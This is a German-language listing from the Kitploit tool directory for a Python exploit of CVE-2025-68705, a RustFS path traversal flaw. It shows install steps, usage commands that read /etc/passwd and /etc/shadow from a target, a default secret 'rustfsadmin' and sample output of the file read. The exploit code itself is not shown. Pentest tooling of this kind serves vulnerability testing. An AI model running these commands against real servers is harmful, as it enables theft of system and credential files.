Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-68705 — CVE-2025-68705 RustFS Path Traversal Vulnerability Check | Kitploit
Tools/GitHubGitHub/imjdl/cve-2025-68705
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubimjdl/cve-2025-68705

CVE-2025-68705

CVE-2025-68705 RustFS Path Traversal Vulnerability Check

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-68705 – RustFS Pfadumgehungs-Exploit

Beschreibung

Dieses Skript nutzt eine Pfadumgehungsschwachstelle (CVE-2025-68705) in RustFS aus, die das Lesen beliebiger Dateien auf dem Server ermöglicht.

Voraussetzungen

  • Python 3.6+
  • Siehe requirements.txt für Abhängigkeiten

Installation

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt

Verwendung

root@kitploit:~
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

Erforderliche Argumente

ArgumentBeschreibung
-H, --hostIP-Adresse oder Hostname des Zielsystems
-p, --portZielportnummer
-f, --fileDateipfad zum Lesen (optional mit --check-only)

Optionale Argumente

Beispiele

Datei /etc/passwd lesen

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd

/etc/shadow mit benutzerdefiniertem Offset und Länge lesen

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024

Benutzerdefinierten geheimen Schlüssel verwenden

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret

Nur prüfen, ob das Ziel verwundbar ist

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 --check-only

Bestimmten Bereich einer Datei lesen

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200

Beispielausgabe

root@kitploit:~
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

Referenzen

  • RustFS Security Advisory
  • CVE-2025-68705
Tool herunterladen
ArgumentBeschreibungStandard
-s, --secretGeheimer Schlüssel für die Signaturrustfsadmin
-o, --offsetOffset beim Lesen der Datei0
-l, --lengthAnzahl der zu lesenden Bytes4096
--check-onlyNur prüfen, ob das Ziel verwundbar ist-